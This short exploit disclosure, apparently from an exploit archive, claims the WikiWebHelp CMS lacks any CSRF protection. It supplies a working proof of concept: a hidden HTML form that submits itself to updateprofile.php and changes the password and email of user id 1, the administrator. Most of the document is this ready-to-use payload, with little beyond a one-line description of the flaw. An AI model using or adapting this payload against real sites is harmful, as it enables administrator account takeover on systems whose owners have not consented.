#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: yoyahack@undersecurity.net
#CMS: WikiWebHelp
The entire system is vulnerable to CSRF (cross-site request forgery) because
it includes no mechanism to prevent CSRF attacks.
Example:
Changing the password of any user, including the administrator.
Exploit:
<form name="CSRF" method="post" action="http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
</form>
<script>document.CSRF.submit()</script>